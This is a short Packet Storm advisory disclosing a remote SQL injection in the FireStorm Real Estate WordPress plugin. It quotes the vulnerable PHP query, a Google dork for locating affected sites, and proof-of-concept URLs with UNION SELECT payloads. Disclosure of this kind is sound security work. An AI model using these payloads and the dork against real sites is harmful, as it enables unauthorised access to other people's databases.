WordPress FireStorm Real Estate third party plugin version 2.06.08 suffer from a remote SQL injection vulnerability.
afee220fc37a19dd1e4636328e01cb5548fc2e617d7f0cd1f863b9b1eac2f164
Title => FireStorm Real Estate SQL Injection.
Date => 10/19/2012
Version => 2.06.08
Vendor => http://www.firestormplugins.com
Tested on => Microsoft Windows 7, Linux BackBox.
Discovered by => B00B5 [http://www.hackforums.net/member.php?action=profile&uid=1403300]
Download => http://wordpress.org/extend/plugins/fs-real-estate-plugin/
Google Dork => inurl:"/xml/marker_listings.xml?id" filetype:xml
Vulnerable Code => if (isset($_GET['id'])) {
if (is_numeric($_GET['id'])) {
$query = "SELECT * FROM ".$table_prefix."fsrep_listings
WHERE listing_long != '' AND listing_lat != '' AND listing_id =
".$_GET['id'
PoC => /wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=[SQL Query]
=> /wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=null UNION SELECT 1,2,3,4,version()--
Demo
=>
/wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=null
UNION SELECT
1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed